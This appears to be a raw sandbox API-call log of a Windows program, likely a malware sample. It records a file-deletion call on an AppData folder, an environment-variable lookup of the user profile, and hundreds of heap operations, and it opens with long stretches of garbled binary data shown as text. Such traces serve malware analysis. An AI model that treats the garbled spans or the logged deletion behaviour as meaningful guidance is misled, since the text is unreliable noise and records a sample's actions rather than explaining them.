큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0199.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0199.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0199.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0199.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0199.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0199.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0199.251] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0199.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0199.251] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0199.251] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0199.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0199.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0199.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0199.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0199.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0199.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0199.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0199.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0199.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0199.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0199.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0199.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0199.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0199.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Publishers", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0199.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ublishers", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0199.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="blishers", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lishers", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ishers", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="shers", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0199.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0199.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0199.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0199.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0199.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0199.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0199.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0199.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0199.252] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0199.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0199.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0199.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0199.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0199.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0199.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0199.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0199.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0199.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0199.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0199.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0199.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0199.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0199.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0199.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0199.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0199.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0199.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0199.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6f40 [0199.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0199.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Publishers", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ublishers", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="blishers", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lishers", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ishers", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0199.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0199.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0199.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0199.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0199.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0199.254] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0199.254] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0199.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0199.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72648 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0199.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0199.254] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa600 [0199.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0199.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0199.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0199.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0199.255] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0199.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0199.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0199.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0199.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0199.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0199.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0199.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0199.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0199.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0199.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0199.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0199.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0199.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0199.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0199.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0199.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0199.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0199.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0199.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0199.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0199.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0199.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0199.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0199.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0199.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0199.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0199.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0199.256] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, 